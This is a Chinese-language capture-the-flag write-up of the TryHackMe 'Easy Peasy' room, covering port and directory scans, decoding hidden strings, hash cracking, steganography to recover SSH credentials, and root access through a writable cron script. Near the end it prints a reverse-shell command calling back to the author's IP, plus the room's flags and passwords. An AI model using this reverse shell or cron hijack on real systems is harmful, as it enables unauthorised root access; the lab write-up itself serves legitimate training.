关于ctf:TryhackmeEasy-Peasy目录爆破图片隐写Cron

3次阅读

共计 7441 个字符，预计需要花费 19 分钟才能阅读完成。

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。

┌──(root💀kali)-[~/tryhackme/EasyPeasy]
└─# nmap -sV -Pn 10.10.246.60 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-11-12 03:25 EST
Nmap scan report for 10.10.246.60
Host is up (0.30s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 829.53 seconds

80 端口，关上是一个 nginx 的欢送页面，源代码找到 flag3

They are activated by symlinking availableconfiguration files from their respectiveFl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}*-available/ counterparts. These should be managedby using our helpers

65524 也一个 http 端口，关上是一个 apache 的欢送页，源代码无特地货色。

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.246.60 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545

Output File: /root/dirsearch/reports/10.10.246.60/_21-11-12_03-36-16.txt

Error Log: /root/dirsearch/logs/errors-21-11-12_03-36-16.log

Target: http://10.10.246.60/

[03:36:17] Starting: 
[03:37:38] 301 -  169B  - /hidden  ->  http://10.10.246.60/hidden/

/hidden 文件夹下有一张图片，下载到本地当前不能拆散出文件，可能须要明码

持续爆破 hidder 下的目录：

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.246.60/hidden -w /usr/share/wordlists/dirb/small.txt 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                       
 (_||| _) (/_(_|| (_|)                                                                                                                                                
                                                                                                                                                                       
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 959

Output File: /root/dirsearch/reports/10.10.246.60/-hidden_21-11-14_09-45-18.txt

Error Log: /root/dirsearch/logs/errors-21-11-14_09-45-18.log

Target: http://10.10.246.60/hidden/

[09:45:19] Starting: 
[09:45:31] 301 -  169B  - /hidden/whatever  ->  http://10.10.246.60/hidden/whatever/

关上 /whatever 目录，显示：

<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
    body {background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
    background-repeat: no-repeat;
    background-size: cover;
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>

暗藏的 p 元素 base64 解密进去失去第一个 flag：flag{f1rs7_fl4g}

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.246.60:65524/                                                                  

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.246.60-65524/-_21-11-12_03-51-03.txt

Error Log: /root/dirsearch/logs/errors-21-11-12_03-51-03.log

Target: http://10.10.246.60:65524/

[03:51:04] Starting:    
[03:52:34] 200 -   11KB - /index.html                                       
[03:53:12] 200 -  153B  - /robots.txt

robots.txt 显示：

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

md5 解进去是：flag{1m_s3c0nd_fl4g}, 为 flag2

下载 easypeasy.txt 文件到本地，grep 当前失去 flag3

┌──(root💀kali)-[~/tryhackme/EasyPeasy]
└─# cat easypeasy.txt|grep flag                                                                                                                                                                                                         1 ⨯
flag{9fdafbd64c47471a8f54cd3fc64cd312}
flagsrule
flags2
flags101
flagirl
flagflag
flagator
flag93
flag890
flag2006
flag11

在这里如同走入死胡同了，回到 apache 页面，在源码里找到另一个货色：

<span class="floating_element">
          Apache 2 It Works For Me
    <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
        </span>

这个是 base62 加密，解进去是：/n0th1ng3ls3m4tt3r

浏览器关上暗藏文件夹，看到一张图片，查看网页源代码：

<html>
<head>
<title>random title</title>
<style>
    body {background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg");
    background-color:black;


    }
</style>
</head>
<body>
<center>
<img src="binarycodepixabay.jpg" width="140px" height="140px"/>
<p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
</center>
</body>
</html>

把 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81 保留到 hash.txt，用 john 破解：

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# john --wordlist=easypeasy.txt --format=gost hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2021-11-14 10:01) 50.00g/s 204800p/s 204800c/s 204800C/s vgazoom4x..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed

失去一个明码：mypasswordforthatjob

咱们把 binarycodepixabay.jpg 这张图片下载到本地，用 steghide 命令以及下面破译的明码作为解密密令，拆散出一个 secrettext.txt 文件

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# steghide extract -sf binarycodepixabay.jpg          
Enter passphrase: 
wrote extracted data to "secrettext.txt".
                                                                                                                                                                                                                                                                                                                             
┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# ls
binarycodepixabay.jpg  easypeasy.txt  hash.txt  lost-places-1928727_960_720.jpg  secrettext.txt
                                                                                                                                                                                                                                                                                                                             
┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# cat secrettext.txt 
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

把下面的二进制转成文本如下：
iconvertedmypasswordtobinary

所以当初咱们失去了一个 ssh 凭证：boring：iconvertedmypasswordtobinary

登录 ssh，拿到 user.txt

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# ssh boring@10.10.246.60 -p 6498           
*************************************************************************
**        This connection are monitored by government offical          **
**            Please disconnect if you are not authorized              **
** A lawsuit will be filed against you if the law is not followed      **
*************************************************************************
boring@10.10.246.60's password: 
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
boring@kral4-PC:~$ ls
user.txt
boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}

去到这个网站，用 rot13 解密失去 user flag

传 linpea，发现有一个 root 执行的定时工作：

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

查看定时工作内容以及权限：

boring@kral4-PC:/var/www$ ls -alh
total 16K
drwxr-xr-x  3 root   root   4.0K Jun 15  2020 .
drwxr-xr-x 14 root   root   4.0K Jun 13  2020 ..
drwxr-xr-x  4 root   root   4.0K Jun 15  2020 html
-rwxr-xr-x  1 boring boring   33 Jun 14  2020 .mysecretcronjob.sh
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
#!/bin/bash
# i will run as root

看来咱们有写入权限

写 shell 进定时工作脚本：

boring@kral4-PC:/var/www$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /var/www/.mysecretcronjob.sh
boring@kral4-PC:/var/www$ cat /var/www/.mysecretcronjob.sh
#!/bin/bash
# i will run as root
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

另外开一个 shell 监听 4242 端口，一分钟后收到反弹的 shell：

┌──(root💀kali)-[~/tryhackme/easypeasy]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.246.60] 33184
bash: cannot set terminal process group (16165): Inappropriate ioctl for device
bash: no job control in this shell
root@kral4-PC:~# whoami
whoami
root

拿到 root.txt

root@kral4-PC:~# ls -alh
ls -alh
total 40K
drwx------  5 root root 4.0K Jun 15  2020 .
drwxr-xr-x 23 root root 4.0K Jun 15  2020 ..
-rw-------  1 root root    2 Nov 14 07:35 .bash_history
-rw-r--r--  1 root root 3.1K Jun 15  2020 .bashrc
drwx------  2 root root 4.0K Jun 13  2020 .cache
drwx------  3 root root 4.0K Jun 13  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Jun 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   39 Jun 15  2020 .root.txt
-rw-r--r--  1 root root   66 Jun 14  2020 .selected_editor

正文完